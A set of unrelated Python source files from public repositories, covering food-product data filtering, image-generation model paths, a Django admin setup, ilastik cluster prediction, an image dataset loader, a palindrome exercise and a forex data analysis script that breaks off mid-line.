module.\n\"\"\"\nfrom configuration.config import SELECTED_CATEGORIES\n\n\nclass Tests:\n \"\"\"Tests class.\n \"\"\"\n def __init__(self):\n self.valid = False\n self.consistent_categories = []\n self.consistent_products = []\n self.unique_products = []\n\n def test_integer(self, value):\n \"\"\"Method that test if input is a number\n \"\"\"\n if value.isnumeric():\n self.valid = True\n else:\n self.valid = False\n return self.valid\n\n def test_string(self, value):\n \"\"\"Method that test if input is an alphabetic character\n \"\"\"\n if value.isalpha():\n self.valid = True\n else:\n self.valid = False\n return self.valid\n\n def test_categories_consistency(self, categories):\n \"\"\"Method that filter-in only OFF API categories that got values for\n id, name and url attributes.\n \"\"\"\n self.consistent_categories.clear()\n for category in categories:\n try:\n if category[\"id\"] in SELECTED_CATEGORIES and \\\n category[\"name\"] and category[\"url\"]:\n valid_category = (\n category[\"id\"], category[\"name\"], category[\"url\"])\n self.consistent_categories.append(valid_category)\n except KeyError:\n pass\n\n def test_products_consistency(self, products, category):\n \"\"\"Method that filter-in only OFF API products that got values for\n id, product_name, nutriscore_grade and url attributes.\n \"\"\"\n self.consistent_products.clear()\n for product in products:\n try:\n if product[\"id\"] and product[\"product_name\"] and \\\n product[\"nutriscore_grade\"] and product[\"url\"]:\n consistent_product = (\n product[\"id\"], product[\"product_name\"],\n product[\"nutriscore_grade\"], category.id_category,\n product[\"url\"], product[\"stores\"])\n self.consistent_products.append(consistent_product)\n except KeyError:\n pass\n self.test_products_duplicate()\n\n def test_products_duplicate(self):\n \"\"\"Method that filter-in only OFF API products that are\n unique per name and id_category.\n \"\"\"\n self.unique_products.clear()\n product_tuples_list = []\n for product in self.consistent_products:\n product_tuple = (product[1], product[3])\n if product_tuple not in product_tuples_list:\n product_tuples_list.append(product_tuple)\n self.unique_products.append(product)\n","repo_name":"ThomasPiergiovanni/oc_p5","sub_path":"verification/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26756947317","text":"import os\nfrom modules.model_loader import load_file_from_url\n\n\nmodelfile_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/checkpoints/'))\nlorafile_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/loras/'))\nvae_approx_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/vae_approx/'))\nupscale_models_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/upscale_models/'))\ninpaint_models_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../models/inpaint/'))\ntemp_outputs_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../outputs/'))\n\nfooocus_expansion_path = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '../models/prompt_expansion/fooocus_expansion'))\n\nos.makedirs(temp_outputs_path, exist_ok=True)\n\ndefault_base_model_name = 'sd_xl_base_1.0_0.9vae.safetensors'\ndefault_refiner_model_name = 'sd_xl_refiner_1.0_0.9vae.safetensors'\ndefault_lora_name = 'sd_xl_offset_example-lora_1.0.safetensors'\ndefault_lora_weight = 
0.5\n\nmodel_filenames = []\nlora_filenames = []\n\n\ndef get_model_filenames(folder_path):\n if not os.path.isdir(folder_path):\n raise ValueError(\"Folder path is not a valid directory.\")\n\n filenames = []\n for filename in os.listdir(folder_path):\n if os.path.isfile(os.path.join(folder_path, filename)):\n for ends in ['.pth', '.ckpt', '.bin', '.safetensors', '.fooocus.patch']:\n if filename.lower().endswith(ends):\n filenames.append(filename)\n break\n\n return filenames\n\n\ndef update_all_model_names():\n global model_filenames, lora_filenames\n model_filenames = get_model_filenames(modelfile_path)\n lora_filenames = get_model_filenames(lorafile_path)\n return\n\n\ndef downloading_inpaint_models():\n load_file_from_url(\n url='https://huggingface.co/lllyasviel/fooocus_inpaint/resolve/main/fooocus_inpaint_head.pth',\n model_dir=inpaint_models_path,\n file_name='fooocus_inpaint_head.pth'\n )\n load_file_from_url(\n url='https://huggingface.co/lllyasviel/fooocus_inpaint/resolve/main/inpaint.fooocus.patch',\n model_dir=inpaint_models_path,\n file_name='inpaint.fooocus.patch'\n )\n return os.path.join(inpaint_models_path, 'fooocus_inpaint_head.pth'), os.path.join(inpaint_models_path, 'inpaint.fooocus.patch')\n\n\nupdate_all_model_names()\n","repo_name":"powersimple/Fooocus","sub_path":"modules/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"34141223212","text":"from django.contrib import admin\nfrom apps.route.models import Route, Tag,RouteTag\nfrom .forms import RouteAdminForm\n\nclass CustomTag(admin.ModelAdmin):\n list_display = ('tag_name',)\n \n\nclass CustomRoute(admin.ModelAdmin):\n form = RouteAdminForm\n list_display = (\n \"title\",\n \"user_id\",\n \"level\",\n \"get_tags\",\n \"location\",\n \"get_description\",\n )\n \n @admin.display(description=\"tags\")\n def get_tags(self,obj):\n return \", \".join([tag.tag_name for tag in obj.tags.all()])\n\n @admin.display(description=\"description\")\n def get_description(self,obj):\n return obj.description[:50]+\"...\"\n \n \nclass CustomRouteTag(admin.ModelAdmin):\n list_display = (\n \"title\",\n \"tag\"\n )\n \n\nadmin.site.register(Tag, CustomTag)\nadmin.site.register(Route,CustomRoute)\nadmin.site.register(RouteTag,CustomRouteTag)\n\n\n\n","repo_name":"TimoGronau/longboardboi","sub_path":"apps/route/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"650249837","text":"#! 
/usr/bin/python\n\nimport os\nimport sys\nimport json\n\nimport numpy as np\nimport luigi\nimport nifty.tools as nt\n\nimport cluster_tools.utils.volume_utils as vu\nimport cluster_tools.utils.function_utils as fu\nfrom cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask\n\ntry:\n import lazyflow\n from ilastik.experimental.api import from_project_file\n # set the number of threads used by ilastik to 0.\n # otherwise it does not work inside of the torch loader (and we want to limit number of threads anyways)\n # see https://github.com/ilastik/ilastik/issues/2517\n lazyflow.request.Request.reset_thread_pool(0)\nexcept ImportError:\n from_project_file = None\ntry:\n from xarray import DataArray\nexcept ImportError:\n DataArray = None\n\n\nclass PredictionBase(luigi.Task):\n \"\"\" Prediction base class\n \"\"\"\n\n task_name = \"prediction\"\n src_file = os.path.abspath(__file__)\n allow_retry = False\n\n input_path = luigi.Parameter()\n input_key = luigi.Parameter()\n output_path = luigi.Parameter()\n output_key = luigi.Parameter()\n mask_path = luigi.Parameter(default=\"\")\n mask_key = luigi.Parameter(default=\"\")\n ilastik_project = luigi.Parameter()\n halo = luigi.ListParameter()\n out_channels = luigi.ListParameter(default=None)\n\n @staticmethod\n def default_task_config():\n # we use this to get also get the common default config\n config = LocalTask.default_task_config()\n config.update({\"dtype\": \"float32\"})\n return config\n\n # would be nice to get this directly from the ilastik project instead\n # of running inference once, see also\n # https://github.com/ilastik/ilastik/issues/2530\n def get_out_channels(self, input_shape, input_channels):\n ilp = from_project_file(self.ilastik_project)\n dims = (\"z\", \"y\", \"x\")\n if input_channels is not None:\n input_shape = (input_channels,) + input_shape\n dims = (\"c\",) + dims\n input_ = np.random.rand(*input_shape).astype(\"float32\")\n input_ = DataArray(input_, dims=dims)\n pred = ilp.predict(input_)\n n_out_channes = pred.shape[-1]\n return list(range(n_out_channes))\n\n def run_impl(self):\n assert from_project_file is not None\n assert DataArray is not None\n # get the global config and init configs\n shebang, block_shape, roi_begin, roi_end = self.global_config_values()\n self.init(shebang)\n\n # load the task config\n config = self.get_task_config()\n shape = vu.get_shape(self.input_path, self.input_key)\n if len(shape) == 4:\n in_channels = shape[0]\n shape = shape[1:]\n else:\n in_channels = None\n assert len(shape) == 3\n block_list = vu.blocks_in_volume(shape, block_shape, roi_begin, roi_end)\n\n out_channels = self.out_channels\n if out_channels is None:\n out_channels = self.get_out_channels(block_shape, in_channels)\n\n # create the output dataset\n chunks = tuple(bs // 2 for bs in block_shape)\n n_channels = len(out_channels)\n if n_channels > 1:\n shape = (n_channels,) + shape\n chunks = (1,) + chunks\n dtype = config.get(\"dtype\", \"float32\")\n with vu.file_reader(self.output_path) as f:\n f.require_dataset(self.output_key, shape=shape, chunks=chunks, dtype=dtype, compression=\"gzip\")\n\n # update the config with input and output paths and keys\n # as well as block shape\n config.update({\"input_path\": self.input_path, \"input_key\": self.input_key,\n \"output_path\": self.output_path, \"output_key\": self.output_key,\n \"halo\": self.halo, \"ilastik_project\": self.ilastik_project,\n \"out_channels\": out_channels, \"block_shape\": block_shape})\n if self.mask_path != \"\":\n assert 
self.mask_key != \"\"\n config.update({\"mask_path\": self.mask_path, \"mask_key\": self.mask_key})\n\n n_jobs = min(len(block_list), self.max_jobs)\n # prime and run the jobs\n self.prepare_jobs(n_jobs, block_list, config)\n self.submit_jobs(n_jobs)\n\n # wait till jobs finish and check for job success\n self.wait_for_jobs()\n self.check_jobs(n_jobs)\n\n\nclass PredictionLocal(PredictionBase, LocalTask):\n \"\"\" Prediction on local machine\n \"\"\"\n pass\n\n\nclass PredictionSlurm(PredictionBase, SlurmTask):\n \"\"\" Prediction on slurm cluster\n \"\"\"\n pass\n\n\nclass PredictionLSF(PredictionBase, LSFTask):\n \"\"\" Prediction on lsf cluster\n \"\"\"\n pass\n\n\n# TODO implement more dtype conversion\ndef _to_dtype(input_, dtype):\n idtype = input_.dtype\n if np.dtype(dtype) == idtype:\n return input_\n elif dtype == \"uint8\":\n input_ *= 255.\n return input_.astype(\"uint8\")\n else:\n raise NotImplementedError(dtype)\n\n\ndef _pad_if_necessary(data, shape):\n if data.shape == shape:\n return data, None\n pad_width = []\n crop = []\n for dsh, sh in zip(data.shape, shape):\n if dsh == sh:\n pad_width.append((0, 0))\n crop.append(slice(None))\n else:\n assert sh > dsh\n pad_width.append((0, sh - dsh))\n crop.append(slice(0, dsh))\n data = np.pad(data, pad_width)\n assert data.shape == shape\n return data, tuple(crop)\n\n\ndef _predict_block(block_id, blocking, ilp, ds_in, ds_out, ds_mask, halo, out_channels):\n fu.log(\"Start processing block %i\" % block_id)\n block = blocking.getBlockWithHalo(block_id, halo)\n bb = vu.block_to_bb(block.outerBlock)\n\n # check if there is any data to be processed, if we have a mask\n if ds_mask is not None:\n bb_mask = ds_mask[bb].astype(\"bool\")\n if np.sum(bb_mask) == 0:\n fu.log_block_success(block_id)\n return\n\n dims = (\"z\", \"y\", \"x\")\n if ds_in.ndim == 4:\n bb = (slice(None),) + bb\n dims = (\"c\",) + dims\n input_ = ds_in[bb]\n\n # we need to pad to the full size for border chunks, because otherwise some filters may not be valid\n full_block_shape = tuple(sh + 2*ha for sh, ha in zip(blocking.blockShape, halo))\n input_, crop = _pad_if_necessary(input_, full_block_shape)\n\n # if we have a mask should set it as prediction mask in ilastik\n # (currently not supported by ilastik)\n pred = ilp.predict(DataArray(input_, dims=dims)).values\n if crop is not None:\n pred = pred[crop]\n\n inner_bb = vu.block_to_bb(block.innerBlockLocal)\n inner_bb = inner_bb + (tuple(out_channels),)\n pred = pred[inner_bb]\n if pred.shape[-1] == 1:\n pred = pred[..., 0]\n else:\n pred = pred.transpose((3, 0, 1, 2))\n pred = _to_dtype(pred, ds_out.dtype)\n assert pred.ndim in (3, 4)\n\n bb = vu.block_to_bb(block.innerBlock)\n if pred.ndim == 4:\n bb = (slice(None),) + bb\n ds_out[bb] = pred\n fu.log_block_success(block_id)\n\n\ndef prediction(job_id, config_path):\n\n fu.log(\"start processing job %i\" % job_id)\n fu.log(\"reading config from %s\" % config_path)\n\n # get the config\n with open(config_path, \"r\") as f:\n config = json.load(f)\n\n input_path = config[\"input_path\"]\n input_key = config[\"input_key\"]\n halo = config[\"halo\"]\n ilastik_project = config[\"ilastik_project\"]\n\n output_path = config[\"output_path\"]\n output_key = config[\"output_key\"]\n out_channels = config[\"out_channels\"]\n\n assert os.path.exists(ilastik_project), ilastik_project\n assert os.path.exists(input_path)\n\n block_shape = config[\"block_shape\"]\n block_list = config[\"block_list\"]\n shape = vu.get_shape(input_path, input_key)\n if len(shape) == 4:\n shape = 
shape[1:]\n    blocking = nt.blocking([0, 0, 0], shape, block_shape)\n\n    ilp = from_project_file(ilastik_project)\n    fu.log(\"start ilastik prediction\")\n    with vu.file_reader(input_path, \"r\") as f_in, vu.file_reader(output_path, \"a\") as f_out:\n        ds_in = f_in[input_key]\n        ds_out = f_out[output_key]\n\n        if \"mask_path\" in config:\n            mask_path, mask_key = config[\"mask_path\"], config[\"mask_key\"]\n            fu.log(\"Load mask from %s:%s\" % (mask_path, mask_key))\n            mask = vu.load_mask(mask_path, mask_key, shape)\n            fu.log(\"Have loaded mask\")\n        else:\n            mask = None\n\n        for block_id in block_list:\n            _predict_block(block_id, blocking, ilp, ds_in, ds_out, mask, halo, out_channels)\n\n    fu.log_job_success(job_id)\n\n\nif __name__ == \"__main__\":\n    path = sys.argv[1]\n    assert os.path.exists(path), path\n    job_id = int(os.path.split(path)[1].split(\".\")[0].split(\"_\")[-1])\n    prediction(job_id, path)\n","repo_name":"constantinpape/cluster_tools","sub_path":"cluster_tools/ilastik/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"6"}
{"seq_id":"24167553314","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nimport random\n\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom TwoInputDistortion import Distortion\nimport utils\n\nclass TwoInputDataset():\n    \"\"\"\n    The txt file to be read should be written in the form:\n    <path> class_number\n    <path> class_number\n    \"\"\"\n    def __init__(self, **kwargs):\n        self.train_path_c = [] ## cropped images\n        self.train_path_o = [] ## full size images\n        self.train_label_c = [] # like [[0,0,0,1,0,0,0,0,0],...] (1-of-k)\n        self.test_path_c = []\n        self.test_path_o = []\n        self.test_label_c = []\n        self.image_size = kwargs[\"image_size\"]\n        self.num_classes = kwargs[\"num_classes\"]\n        self.distortion = Distortion(gamma=2)\n\n\n        def getPathandLabel(path, num_classes): # get image paths and labels\n            with open(path, 'r') as f:\n                f_ = [line.rstrip().split() for line in f]\n                image_paths = [l[0] for l in f_]\n\n                labels = [] # prepared as 1-of-k vectors\n                for l in f_:\n                    tmp = [0]*num_classes\n                    tmp[int(l[1])] = 1\n                    labels.append(tmp) \n\n                return image_paths, labels\n\n        # if train & test\n        if len(kwargs) == 6 and kwargs[\"train_c\"] is not None and kwargs[\"train_o\"] is not None and kwargs[\"test_c\"] is not None and kwargs[\"test_o\"] is not None:\n            train_c = kwargs[\"train_c\"]\n            train_o = kwargs[\"train_o\"]\n            test_c = kwargs[\"test_c\"]\n            test_o = kwargs[\"test_o\"]\n\n            self.train_path_c, self.train_label_c = getPathandLabel(train_c, self.num_classes)\n            self.train_path_o, _ = getPathandLabel(train_o, self.num_classes)\n            self.test_path_c, self.test_label_c = getPathandLabel(test_c, self.num_classes)\n            self.test_path_o, _ = getPathandLabel(test_o, self.num_classes)\n\n            # convert to numpy arrays\n            self.train_label_c = np.asarray(self.train_label_c)\n            self.test_label_c = np.asarray(self.test_label_c)\n\n        # if only test\n        elif len(kwargs) == 4 and kwargs[\"test_c\"] is not None and kwargs[\"test_o\"] is not None:\n            # arguments\n            test_c = kwargs[\"test_c\"]\n            test_o= kwargs[\"test_o\"]\n\n            self.test_path_c, self.test_label_c = getPathandLabel(test_c, self.num_classes)\n            self.test_path_o, _ = getPathandLabel(test_o, self.num_classes)\n\n            # convert to numpy arrays\n            self.test_label_c = np.asarray(self.test_label_c)\n\n        else:\n            print(\"Dataset initializer args error. (need 4 or 6 args)\")
(need 4 or 6 args)\")\n sys.exit()\n\n def shuffle(self):\n # shuffle (dataとlabelの対応が崩れないように)\n def shuffle_data(paths_c, paths_o, labels):\n indexl = [i for i in range(len(paths_c))]\n shuffled_indexl = list(indexl)\n random.shuffle(shuffled_indexl)\n\n shuffled_c = paths_c\n shuffled_o = paths_o\n shuffled_labels = labels\n\n for i, (path_c, path_o, label) in enumerate(zip(paths_c, paths_o, labels)):\n shuffled_c[shuffled_indexl[i]] = path_c\n shuffled_o[shuffled_indexl[i]] = path_o\n shuffled_labels[shuffled_indexl[i]] = label\n\n return shuffled_c, shuffled_o, shuffled_labels\n\n if self.train_path_c:# 空じゃなければ\n self.train_path_c, self.train_path_o, self.train_label_c = shuffle_data(self.train_path_c, self.train_path_o, self.train_label_c)\n\n if self.test_path_c:\n self.test_path_c, self.test_path_o, self.test_path_c = shuffle_data(self.test_path_c, self.test_path_o, self.test_path_c)\n\n # # indexの対応関係が破壊されてないかの確認\n # for i, (test1, test2, label) in enumerate(zip(self.test_path_c, self.test_path_o, self.test_path_c)):\n # print(i, test1, test2, label)\n\n def getBatch(self, batchsize, index, mode='train'):\n if mode == 'train':\n pathsA = self.train_path_c\n pathsB = self.train_path_o\n labels = self.train_label_c\n else:\n pathsA = self.test_path_c\n pathsB = self.test_path_o\n labels = self.test_label_c\n\n batchA = []\n batchB = []\n start = batchsize * index\n end = start + batchsize\n\n for i, (pathA, pathB) in enumerate(zip(pathsA[start:end], pathsB[start:end])):\n # pathB = pathsB[start+i]\n\n # imageA = cv2.imread(pathA)\n # imageB = cv2.imread(pathB)\n\n # # cv2.imread()はBGR\n imageA = np.array(Image.open(pathA)) / 255\n imageB = np.array(Image.open(pathB)) / 255\n #\n #\n # # imageA, imageB = self.distortion.distort(images=[imageA, imageB], flag=mode, p=1.0)\n #\n #imageA = cv2.resize(padding(imageA), (self.image_size, self.image_size))\n imageA = cv2.resize(imageA, (self.image_size, self.image_size))\n #imageB = cv2.resize(padding(imageB), (self.image_size, self.image_size))\n imageB = cv2.resize(imageB, (self.image_size, self.image_size))\n # imageA = utils.load_image(pathA, normalize=True)\n # imageB = utils.load_image(pathB, normalize=True)\n\n # batchA.append(imageA.astype(np.float32)/255.0)\n # batchB.append(imageB.astype(np.float32)/255.0)\n batchA.append(imageA)\n batchB.append(imageB)\n\n # batchA.append(imageA.flatten().astype(np.float32) / 255.0)\n # batchB.append(imageB.flatten().astype(np.float32) / 255.0)\n\n batchA = np.asarray(batchA)\n batchB = np.asarray(batchB)\n label_batch = labels[start:end]\n\n return {'batch': batchA, 'path': pathsA[start:end]}, {'batch': batchB, 'path': pathsB[start:end]}, label_batch\n\n def getTrainBatch(self, batchsize, index):\n return self.getBatch(batchsize, index, mode='train')\n\n\n def getTestData(self, batchsize, index=0):\n return self.getBatch(batchsize, index, mode='test')\n\ndef padding(image):\n # アス比の違う画像をゼロパディングして正方形にする\n w = image.shape[1]\n h = image.shape[0]\n if w == h:\n return image\n elif w > h:\n offset = w - h\n n = int(offset / 2)\n if offset % 2 == 0:\n dst = np.pad(image, [(n, n), (0, 0), (0, 0)], 'constant')\n else:\n dst = np.pad(image, [(n, n+1), (0, 0), (0, 0)], 'constant')\n return dst\n\n else:\n offset = h - w\n n = int(offset / 2)\n if offset % 2 == 0:\n dst = np.pad(image, [(0, 0), (n, n), (0, 0)], 'constant')\n else:\n dst = np.pad(image, [(0, 0), (n, n+1), (0, 0)], 'constant')\n return dst\n\nif __name__ == '__main__':\n # # test code\n # dataset = 
TwoInputDataset(train_c='/Users/shigetomi/Desktop/dataset_walls/train2.txt',\n # train_o='/Users/shigetomi/Desktop/dataset_walls/train1.txt',\n # test_c='/Users/shigetomi/Desktop/dataset_walls/test2.txt',\n # test_o='/Users/shigetomi/Desktop/dataset_walls/test1.txt',\n # num_classes=6,\n # image_size=229)\n # dataset.shuffle()\n # cropped_batch, orig_batch, labels = dataset.getTrainBatch(batchsize=5, index=0)\n # cropped_test_batch, orig_test_batch, test_labels = dataset.getTestData(batchsize=5)\n #\n # # check image\n # for i,(c, o, l) in enumerate(zip(cropped_batch['batch'], orig_batch['batch'], labels)):\n # print(i, cropped_batch['path'][i], '\\n ', orig_batch['path'][i], '\\n class:', np.where(l == 1)[0][0])\n # cv2.imshow(\"c\", c)\n # cv2.imshow(\"o\", o)\n # cv2.waitKey(0)\n\n # padding test\n image = np.array(Image.open(\"/Users/shigetomi/Desktop/dataset_GOR/cat/cat_cropped/image_0012.jpg\")) / 255\n dst = cv2.resize(padding(image), (224, 224))\n print(\"image:\", image)\n print(\"dst\", dst)\n cv2.imshow(\"dst\", dst)\n cv2.imshow(\"org\", image)\n cv2.waitKey(0)\n","repo_name":"shigenius/tensorflow_works","sub_path":"tf-slim/TwoInputDataset.py","file_name":"TwoInputDataset.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30313918173","text":"def rev(x):\n rev=0\n while x>0:\n r=x%10\n rev=rev*10+r\n x=x//10\n return rev\nx=int(input())\nwhile True:\n x=x+rev(x)\n if x==rev(x):\n print(x)\n break","repo_name":"Seethanveshi/codemind-python","sub_path":"Reverse_Palindrome.py","file_name":"Reverse_Palindrome.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22175866604","text":"# Author:Zhang Yuan\nfrom MyPackage import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport seaborn as sns\nimport statsmodels.api as sm\nfrom scipy import stats\n\n# ------------------------------------------------------------\n__mypath__ = MyPath.MyClass_Path(\"\") # 路径类\nmylogging = MyDefault.MyClass_Default_Logging(activate=False) # 日志记录类,需要放在上面才行\nmyfile = MyFile.MyClass_File() # 文件操作类\nmyword = MyFile.MyClass_Word() # word生成类\nmyexcel = MyFile.MyClass_Excel() # excel生成类\nmyini = MyFile.MyClass_INI() # ini文件操作类\nmytime = MyTime.MyClass_Time() # 时间类\nmyparallel = MyTools.MyClass_ParallelCal() # 并行运算类\nmyplt = MyPlot.MyClass_Plot() # 直接绘图类(单个图窗)\nmypltpro = MyPlot.MyClass_PlotPro() # Plot高级图系列\nmyfig = MyPlot.MyClass_Figure(AddFigure=False) # 对象式绘图类(可多个图窗)\nmyfigpro = MyPlot.MyClass_FigurePro(AddFigure=False) # Figure高级图系列\nmyplthtml = MyPlot.MyClass_PlotHTML() # 画可以交互的html格式的图\nmypltly = MyPlot.MyClass_Plotly() # plotly画图相关\nmynp = MyArray.MyClass_NumPy() # 多维数组类(整合Numpy)\nmypd = MyArray.MyClass_Pandas() # 矩阵数组类(整合Pandas)\nmypdpro = MyArray.MyClass_PandasPro() # 高级矩阵数组类\nmyDA = MyDataAnalysis.MyClass_DataAnalysis() # 数据分析类\nmyDefault = MyDefault.MyClass_Default_Matplotlib() # 画图恢复默认设置类\n# myMql = MyMql.MyClass_MqlBackups() # Mql备份类\n# myBaidu = MyWebCrawler.MyClass_BaiduPan() # Baidu网盘交互类\n# myImage = MyImage.MyClass_ImageProcess() # 图片处理类\nmyBT = MyBackTest.MyClass_BackTestEvent() # 事件驱动型回测类\nmyBTV = MyBackTest.MyClass_BackTestVector() # 向量型回测类\nmyML = MyMachineLearning.MyClass_MachineLearning() # 机器学习综合类\nmySQL = MyDataBase.MyClass_MySQL(connect=False) # MySQL类\nmySQLAPP = MyDataBase.MyClass_SQL_APPIntegration() # 
数据库应用整合\nmyWebQD = MyWebCrawler.MyClass_QuotesDownload(tushare=False) # 金融行情下载类\nmyWebR = MyWebCrawler.MyClass_Requests() # Requests爬虫类\nmyWebS = MyWebCrawler.MyClass_Selenium(openChrome=False) # Selenium模拟浏览器类\nmyWebAPP = MyWebCrawler.MyClass_Web_APPIntegration() # 爬虫整合应用类\nmyEmail = MyWebCrawler.MyClass_Email() # 邮箱交互类\nmyReportA = MyQuant.MyClass_ReportAnalysis() # 研报分析类\nmyFactorD = MyQuant.MyClass_Factor_Detection() # 因子检测类\nmyKeras = MyDeepLearning.MyClass_tfKeras() # tfKeras综合类\nmyTensor = MyDeepLearning.MyClass_TensorFlow() # Tensorflow综合类\nmyMT5 = MyMql.MyClass_ConnectMT5(connect=False) # Python链接MetaTrader5客户端类\nmyMT5Pro = MyMql.MyClass_ConnectMT5Pro(connect=False) # Python链接MT5高级类\nmyMT5Indi = MyMql.MyClass_MT5Indicator() # MT5指标Python版\nmyMT5Report = MyMT5Report.MyClass_StratTestReport(AddFigure=False) # MT5策略报告类\nmyMT5Analy = MyMT5Analysis.MyClass_ForwardAnalysis() # MT5分析类\nmyMT5Lots_Fix = MyMql.MyClass_Lots_FixedLever(connect=False) # 固定杠杆仓位类\nmyMT5Lots_Dy = MyMql.MyClass_Lots_DyLever(connect=False) # 浮动杠杆仓位类\nmyMT5run = MyMql.MyClass_RunningMT5() # Python运行MT5\nmyMT5code = MyMql.MyClass_CodeMql5() # Python生成MT5代码\nmyMoneyM = MyTrade.MyClass_MoneyManage() # 资金管理类\nmyDefault.set_backend_default(\"Pycharm\") # Pycharm下需要plt.show()才显示图\n# ------------------------------------------------------------\n# Jupyter Notebook 控制台显示必须加上:%matplotlib inline ,弹出窗显示必须加上:%matplotlib auto\n# %matplotlib inline\n# import warnings\n# warnings.filterwarnings('ignore')\n\n# %%\nimport warnings\nwarnings.filterwarnings('ignore')\n# 简介\n# 外汇是一个大型的全球市场,允许人们进行货币之间的交易。作为世界上最大的市场,它拥有单日近7万亿美元的交易量。随着人工智能和机器学习的普及,许多人试图预测未来的货币价格,然而,许多人几乎没有成功。\n# 预测金融市场类似于预测未来。由于有这么多未知和不可预测的因素,建立一个机器学习模型来预测未来事件的发生实在是太不可能了(就目前而言)。因此,本笔记本没有试图预测未来的价格,而是对货币市场进行了简单的分析(只分析了一些货币对),它与更广泛的市场的相关性,也许还有我们最近观察到的一些趋势。\n\n# 在本节中,我们将对我们的数据做一个简单的分析,这可能有助于我们以后的数据探索。\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np\nimport pandas as pd\nimport os\nfrom datetime import datetime\n\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nfrom plotly.subplots import make_subplots\nfrom plotly.graph_objs import Line\n\nfrom scipy import stats\nimport seaborn as sns\n\n# Data Paths\n# Data Paths\ndaily_eurusd_df = myMT5Pro.getsymboldata(\"EURUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nxau_eur_df = myMT5Pro.getsymboldata(\"XAUEUR\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nxau_usd_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\noil_df = myMT5Pro.getsymboldata(\"XTIUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nusd_index_df = myMT5Pro.getsymboldata(\"USDX.index\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nus_interest_rates = None\ngold_prices_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\ndaily_usdjpy_df = myMT5Pro.getsymboldata(\"USDJPY\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nvix_df = None\nsnp_500_df = myMT5Pro.getsymboldata(\"US500\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], 
[2024,1,1,0,0,0], index_time=True,col_capitalize=True)\n\n#%%\n# Renaming Columns For Merging Later on\ndaily_eurusd_df.rename(columns = {'Close' : 'EURUSD_Price', 'Open' : 'EURUSD_Open', \"High\":\"EURUSD_High\", \"Low\":\"EURUSD_Low\", \"Rate\":\"EURUSD_Change%\"}, inplace = True)\nxau_usd_df.rename(columns = {'Close' : 'XAUUSD_Price', 'Open' : 'XAUUSD_Open', \"High\":\"XAUUSD_High\", \"Low\":\"XAUUSD_Low\", \"Rate\":\"XAUUSD_Change%\"}, inplace = True)\nxau_eur_df.rename(columns = {'Close' : 'XAUEUR_Price', 'Open' : 'XAUEUR_Open', \"High\":\"XAUEUR_High\", \"Low\":\"XAUEUR_Low\", \"Rate\":\"XAUEUR_Change%\"}, inplace = True)\n\n\ndef modify_datetime(df_column):\n \"\"\"\n Changes Date Format from Feb 08, 2020 --> 08/02/2020 [dd/mm/YYYY]\n \"\"\"\n df_column[\"Time\"] = df_column[\"Time\"].apply(lambda x: x.strftime(\"%d/%m/%Y\"))\n # df_column[\"Time\"] = df_column[\"Time\"].apply(lambda x:datetime.strptime(x.lower().replace(\",\", \"\"), \"%b %d %Y\").strftime(\"%d/%m/%Y\"))\n return df_column[\"Time\"]\n\n\ndef remove_comma(df_column, column_name):\n \"\"\"\n Removes Commas from Prices E.g [1,234,234 --> 1234234]\n \"\"\"\n try:\n df_column[column_name] = df_column[column_name].apply(lambda x: x.replace(\",\", \"\"))\n return df_column[column_name]\n except AttributeError:\n # the column is already numeric, so there is nothing to strip\n return df_column[column_name]\n\n\ndaily_eurusd_df[\"Date\"] = modify_datetime(df_column=daily_eurusd_df)\nprint(\"No. of Data Points (EURUSD) :\", len(daily_eurusd_df))\n\nxau_usd_df[\"Date\"] = modify_datetime(xau_usd_df)\nprint(\"No. of Data Points (XAUUSD) :\", len(xau_usd_df))\n\nxau_eur_df[\"Date\"] = modify_datetime(xau_eur_df)\nprint(\"No. of Data Points 